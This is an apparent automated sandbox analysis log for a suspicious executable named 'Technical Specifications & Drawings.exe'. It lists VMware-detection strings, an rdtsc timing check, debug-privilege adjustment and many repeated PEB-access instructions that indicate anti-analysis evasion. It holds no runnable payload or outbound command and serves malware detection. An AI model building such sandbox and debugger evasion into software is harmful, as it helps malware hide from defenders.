Source: explorer.exe, 00000005.00000000.306843353.00000000080ED000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
Source: explorer.exe, 00000005.00000000.286686271.0000000008223000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: VMware SATA CD00l
Source: Technical Specifications & Drawings.exe, 00000000.00000002.263808361.0000000002973000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe | Code function: 4_2_01875BA5 rdtsc
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe | Process token adjusted: Debug
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe | Code function: 4_2_017AB171 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe | Code function: 4_2_017AC962 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe | Code function: 4_2_018649A4 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe | Code function: 4_2_018269A6 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe | Code function: 4_2_017CB944 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe | Code function: 4_2_018251BE mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe | Code function: 4_2_017D513A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe | Code function: 4_2_017C4120 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe | Code function: 4_2_017C4120 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe | Code function: 4_2_018341E8 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe | Code function: 4_2_017A9100 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe | Code function: 4_2_017AB1E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe | Code function: 4_2_017C99BF mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe | Code function: 4_2_017C99BF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe | Code function: 4_2_017D61A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe | Code function: 4_2_017D2990 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe | Code function: 4_2_017DA185 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe | Code function: 4_2_017CC182 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe | Code function: 4_2_01823884 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe | Code function: 4_2_017C0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017C0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017CA830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017CA830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017CA830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017CA830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017D002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017D002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017D002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017D002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017D002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017BB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017BB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017BB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017BB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_0183B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_0183B8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_0183B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_0183B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_0183B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_0183B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01874015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01874015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01827016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01827016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01827016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017A58EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017CB8E4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017CB8E4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017A40E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017A40E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017A40E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017DF0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017DF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017DF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017E90AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017D20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017D20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017D20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017D20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017D20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017D20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01871074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01862073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017A9080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_0185D380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017D3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017D3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_0186138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017ADB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01875BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017AF358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017ADB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_018253CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_018253CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_018523E3 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_018523E3 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_018523E3 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017CA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017CA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017CA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017CA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017CA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017CA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017CA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017CA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017CA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017CA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017CA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017CA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017CA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017CA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017CA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017CA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017CA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017CA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017CA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017CA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017CA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017CDBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_0186131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017D03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017D03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017D03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017D03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017D03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017D03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017D4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017D4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017D4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01878B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017D2397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017DB390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017B1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017B1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017E927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017A9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017A9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017A9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017A9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017E4A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017E4A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017CA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017CA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017CA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017CA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017CA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017CA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017CA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017CA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017CA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017C3A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01864AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01864AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01864AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01864AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01864AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01864AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01864AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01864AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01864AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01864AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01864AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01864AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01864AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01864AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017A5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017A5210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017A5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017A5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017AAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017AAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017B8A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_0186AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_0186AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017D2AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017D2ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017BAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017BAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017DFAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_0186EA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01834257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017A52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017A52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017A52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017A52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017A52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_0185B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_0185B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01878A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017DD294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017DD294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01862D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01862D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01862D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01862D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01862D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01862D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01862D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017CC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017CC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_018705AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_018705AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017C7D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017E3D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017D4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017D4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017D4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017AAD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01826DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01826DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01826DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01826DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01826DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01826DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017B3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017B3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017B3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017B3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017B3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017B3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017B3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017B3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017B3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017B3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017B3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017B3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017B3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_0186FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_0186FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_0186FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_0186FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01858DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017BD5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017BD5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01878D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_0182A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_0186E539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01823540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01853D40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017D1DB5 mov eax, dword ptr fs:[00000030h]
